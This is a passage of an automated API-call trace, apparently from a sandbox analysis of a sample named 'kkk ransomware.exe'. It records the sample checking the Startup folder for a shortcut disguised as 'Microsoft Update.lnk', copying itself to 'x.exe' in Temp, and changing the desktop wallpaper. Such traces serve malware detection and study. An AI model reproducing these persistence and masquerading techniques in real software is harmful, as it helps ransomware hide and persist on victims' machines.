wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.661] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.661] lstrlenW (lpString="69") returned 2 [0225.661] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.661] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.661] lstrlenW (lpString="6E") returned 2 [0225.661] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.661] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.661] lstrlenW (lpString="74") returned 2 [0225.661] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.661] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.662] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0225.662] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.662] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.662] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.662] lstrlenW (lpString="20") returned 2 [0225.662] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.662] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.662] lstrlenW (lpString="30") returned 2 [0225.662] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.662] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.662] lstrlenW (lpString="20") returned 2 [0225.662] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.662] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.662] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.662] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.662] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.662] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0225.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0225.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f6f60, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0225.663] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0225.667] FreeLibrary (hLibModule=0x76240000) returned 1 [0225.667] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.667] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.667] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0225.667] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0225.667] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0225.668] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0xffffffff [0225.668] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk", lpFindFileData=0x8cf498 | out: lpFindFileData=0x8cf498*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x141, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x2af02e8, ftLastWriteTime.dwLowDateTime=0x1, ftLastWriteTime.dwHighDateTime=0x2, nFileSizeHigh=0x2e, nFileSizeLow=0x0, dwReserved0=0x80, dwReserved1=0x8cf4e0, cFileName="ǁ\x01", cAlternateFileName="\x10")) returned 0xffffffff [0225.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0225.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0225.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0225.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0225.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0225.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0225.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0225.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0225.669] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0225.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0225.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0225.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0225.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0225.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0225.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0225.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0225.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0225.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0225.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0225.670] CharUpperBuffW (in: lpsz="ScriptFullPath", cchLength=0xe | out: lpsz="SCRIPTFULLPATH") returned 0xe [0225.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0225.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0225.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4e8 [0225.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0225.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0225.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4b8 [0225.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0225.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0225.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0225.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0225.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0225.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0225.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0225.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0225.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0225.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0225.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0225.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0225.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0225.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0225.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0225.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0225.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0225.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0225.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0225.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0225.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0225.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0225.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0225.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0225.671] CharUpperBuffW (in: lpsz="TempDir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0225.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0225.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0225.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6f8 [0225.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0225.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0225.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4b8 [0225.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0225.671] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0225.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0225.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eaea0 [0225.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0225.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0225.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0225.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0225.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0225.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0225.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0225.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0225.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0225.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0225.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0225.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0225.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0225.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0225.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0225.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eaea0 | out: hHeap=0x2af0000) returned 1 [0225.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0225.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0225.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0225.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0225.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6c) returned 0x29f3ee0 [0225.672] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe", nBufferLength=0x104, lpBuffer=0x8ce9d0, lpFilePart=0x8ce58c | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe", lpFilePart=0x8ce58c*="kkk ransomware.exe") returned 0x35 [0225.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0225.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x52) returned 0x2a5fa80 [0225.672] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\x.exe", nBufferLength=0x104, lpBuffer=0x8cebe0, lpFilePart=0x8ce58c | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\x.exe", lpFilePart=0x8ce58c*="x.exe") returned 0x28 [0225.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5fa80 | out: hHeap=0x2af0000) returned 1 [0225.672] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\kkk ransomware.exe")) returned 0x20 [0225.673] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\x.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\x.exe")) returned 0xffffffff [0225.673] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe", lpFindFileData=0x8cedf0 | out: lpFindFileData=0x8cedf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2285a291, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x2285a291, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x22a23d30, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x8d0d8, dwReserved0=0x8cef38, dwReserved1=0xce, cFileName="kkk ransomware.exe", cAlternateFileName="KKKRAN~1.EXE")) returned 0x9e1bf8 [0225.673] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\x.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\x.exe")) returned 0xffffffff [0225.673] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\x.exe", lpFindFileData=0x8ce318 | out: lpFindFileData=0x8ce318*(dwFileAttributes=0x22a23d30, ftCreationTime.dwLowDateTime=0x1d5dff9, ftCreationTime.dwHighDateTime=0x8d0d8, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x8e000, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x24, nFileSizeLow=0x0, dwReserved0=0x4b0018, dwReserved1=0x4b004b, cFileName="RAN~1.EXEkkk ransomware.exe", cAlternateFileName="")) returned 0xffffffff [0225.673] CopyFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\kkk ransomware.exe"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\x.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\x.exe"), bFailIfExists=0) returned 1 [0225.702] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cedf0 | out: lpFindFileData=0x8cedf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2285a291, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x2285a291, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x22a23d30, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x8d0d8, dwReserved0=0x8cef38, dwReserved1=0xce, cFileName="kkk ransomware.exe", cAlternateFileName="KKKRAN~1.EXE")) returned 0 [0225.702] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0225.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3f58 | out: hHeap=0x2af0000) returned 1 [0225.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0225.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0225.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0225.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0225.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0225.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0225.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0225.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0225.703] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0225.703] TranslateMessage (lpMsg=0x8cf968) returned 0 [0225.703] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0225.703] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0225.703] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0225.703] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0225.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0225.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0225.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0225.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0225.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0225.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0225.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0225.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0225.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0225.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0225.703] CharUpperBuffW (in: lpsz="TempDir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0225.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0225.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0225.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab488 [0225.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0225.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0225.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab638 [0225.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0225.704] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0225.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0225.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29ead40 [0225.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0225.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0225.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0225.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0225.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0225.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0225.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0225.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0225.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0225.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0225.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0225.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0225.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0225.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0225.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0225.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ead40 | out: hHeap=0x2af0000) returned 1 [0225.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0225.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0225.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0225.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0225.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0225.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0225.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0225.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0225.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0225.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0225.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: 